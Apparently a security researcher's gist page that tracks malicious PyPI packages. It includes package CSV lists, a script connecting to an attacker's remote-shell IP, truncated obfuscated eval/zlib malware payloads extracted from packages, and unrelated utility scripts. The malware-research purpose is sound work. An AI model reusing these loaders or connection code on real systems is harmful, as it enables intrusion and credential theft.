jossef / remote-shell.csv
Created January 22, 2023 16:08
Python packages related to the remote-shell incident
Published Package Name Package version owners Package type
Jan 15, 2023 @ 17:30:02.112 aidoc-transit 5.2.4 pypi/aidoc pypi
Jan 15, 2023 @ 16:27:04.363 aidoc-transit 5.2.3 pypi/aidoc pypi
Jan 11, 2023 @ 16:09:01.676 aidoc-transit 5.2.2 pypi/aidoc pypi
Jan 10, 2023 @ 20:51:09.394 aidoc-transit 5.2.1 pypi/aidoc pypi
Dec 29, 2022 @ 20:06:08.912 aidoc-e2e-utils 5.0.3 pypi/aidoc pypi
Dec 29, 2022 @ 20:00:05.994 aidoc.genmfa 3.0.3 pypi/aidoc pypi
Dec 29, 2022 @ 19:57:04.130 aidoc-consul 5.2.0 pypi/aidoc pypi
Dec 29, 2022 @ 04:45:04.156 aidoc.genmfa 3.0.2 pypi/aidoc pypi
Dec 29, 2022 @ 04:39:05.953 aidoc-e2e-utils 5.0.2 pypi/aidoc pypi
jossef / script.py
Last active January 5, 2023 09:20
Script for chatting with the attacker over the remote shell
import socket
import subprocess
def main():
ip_address = '3.221.152.203'
port = 771
print(f'connecting to {ip_address}:{port}')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (ip_address, port)
jossef / packages.csv
Last active December 29, 2022 19:38
Reverse-shell PyPI malware packages
Package Type Package Name Package Version User Account Date
pypi aidoc-e2e-utils 5.0.3 pypi/aidoc 2022-12-29
pypi aidoc-consul 5.0.3 pypi/aidoc 2022-12-29
pypi aidoc.genmfa 3.0.0 pypi/aidoc 2022-12-29
pypi aidoc-e2e-utils 5.0.0 pypi/aidoc 2022-12-29
pypi aidoc.genmfa 3.0.2 pypi/aidoc 2022-12-29
pypi aidoc-e2e-utils 5.0.2 pypi/aidoc 2022-12-29
pypi aidoc-consul 5.0.7 pypi/aidoc 2022-12-29
pypi aidoc-consul 5.0.8 pypi/aidoc 2022-12-29
pypi aidoc.genmfa 3.0.3 pypi/aidoc 2022-12-29
jossef / wasp-packages.csv
Last active November 16, 2022 15:42
WASP malware packages
Package Name Package Version Created
apicolor 1.2.1 2022-10-31T21:32:43.000000
apicolor 1.2.3 2022-11-01T01:32:40.000000
apicolor 1.2.4 2022-11-01T18:48:38.000000
apicolor 6.6.6 2022-11-05T00:00:35.000000
apicolors 6.6.6 2022-11-06T02:00:29.000000
apicolors 6.6.7 2022-11-07T00:32:57.000000
ascii2art 4.1 2022-11-14T13:21:13.000000
blockcypher-lib 1.0.93 2022-11-14T13:54:09.000000
colorapi 0.0.1 2022-11-13T22:03:05.000000
jossef / payload1.py
Last active December 28, 2023 07:45
Malware code from a Python malware reverse-engineering session, 2022-11-13
from builtins import *;wxxwxwwxxxxwwxwwwwww,jijiilliljiilljijjiijl,S222SS2S22S222SSSSS,SSS222S222222SS2SS2S,mmmmnmnnmnmnnnmmnmmnmmn=(lambda lIlIlIlllIIlIIllIllIIlll:lIlIlIlllIIlIIllIllIIlll(__import__('\x7a\x6c\x69\x62'))),(lambda lIlIlIlllIIlIIllIllIIlll:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(lIlIlIlllIIlIIllIllIIlll)"),filename='\x6a\x6c\x6c\x69\x69\x6c\x6a\x6a\x6c\x69\x6c\x6c\x6c\x6c\x6a\x6a\x69\x6c\x69\x6c\x69\x6a\x6c\x69\x6c',mode='\x65\x76\x61\x6c'))),(lambda lIlIlIlllIIlIIllIllIIlll:lIlIlIlllIIlIIllIllIIlll['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda wxxxwxwxxxwxxwwxwxwxxxxxw,lIlIlIlllIIlIIllIllIIlll:wxxxwxwxxxwxxwwxwxwxxxxxw(lIlIlIlllIIlIIllIllIIlll)),(lambda:(lambda lIlIlIlllIIlIIllIllIIlll:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x
jossef / payload.py
Created November 13, 2022 19:49
Malicious payload extracted from the PyPI package "colorsapi"
from builtins import *;XXXXXXXXWXWXWXXWXX,xxxxxxwxxwxxwwxxwwxwxxxx,mmmnnnnnmnnnnmnmnnnnnmn,XXXXXWWWWXXXXWXXXXWWWW,nmnmnnnmnnnmnnnnmnmmn=(lambda IllIlIlIIIIIlllllIIllll:IllIlIlIIIIIlllllIIllll['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda IllIlIlIIIIIlllllIIllll:IllIlIlIIIIIlllllIIllll(__import__('\x7a\x6c\x69\x62'))),(lambda IllIlIlIIIIIlllllIIllll:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(IllIlIlIIIIIlllllIIllll)"),filename='\x6a\x69\x6c\x69\x6a\x6a\x69\x69\x6a\x6a\x6c\x69\x6c\x6c\x6c\x6a\x6a',mode='\x65\x76\x61\x6c'))),(lambda:(lambda IllIlIlIIIIIlllllIIllll:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(IllIlIlIIIIIlllllIIllll)"),filename='\x6a\x69\x6c\x69\x6a\x6
import re
import random
from faker import Faker
import threading
import requests
def worker_thread():
domain = 'marhartap.bs53rssqj9-eqg35wogk3xn.p.runcloud.link'
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36'
jossef / pdf-to-pptx.py
Created November 2, 2021 11:41
PDF to PPTX as raster images (Figma export workaround)
from pptx import Presentation
import fitz
import os
import tempfile
# Input PDF and output PPTX locations; both are placeholders to replace before running.
pdf_file_path = r'path/to/pdf/file.pdf'
pptx_file_path = r'path/to/pptx/file.pptx'
# Start from an empty deck; layout index 6 of the default template is picked up here
# (named as the blank layout — presumably the one each rasterised page is placed on).
presentation = Presentation()
blank_slide_layout = presentation.slide_layouts[6]
jossef / sockets.py
Last active August 25, 2021 11:33
Test script for socket recv timeouts
import select
import socket
def scenario_1__stuck():
    """Demonstrate a recv() that never returns because the socket has no timeout.

    Opens a plain TCP connection, sends one HTTP/1.1 request and reads twice.
    The first recv() presumably returns the response; the second one blocks
    indefinitely since no settimeout() was applied and nothing further arrives.
    """
    sock = socket.create_connection(('neverssl.com', 80))
    sock.send(b'GET / HTTP/1.1\r\nHost: neverssl.com\r\n\r\n')
    data = sock.recv(4096)
    print('1st recv', data)
    data = sock.recv(4096)  # blocks here: no timeout was set on the socket
jossef / force-delete-k8s-namespace.py
Created August 13, 2020 12:50
Force-delete a Kubernetes (k8s) namespace
#!/usr/bin/env python3
import atexit
import json
import requests
import subprocess
import sys
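# Namespace to force-delete, taken from the command line; exit with a usage hint
# instead of an IndexError traceback when it is missing.
if len(sys.argv) < 2:
    sys.exit(f'usage: {sys.argv[0]} <namespace>')
namespace = sys.argv[1]
# kubectl proxy serves the cluster API unauthenticated over plain HTTP on localhost
# using the current kubeconfig credentials, so it must not outlive this script:
# register the kill before any later step can fail.
proxy_process = subprocess.Popen(['kubectl', 'proxy'])
atexit.register(proxy_process.kill)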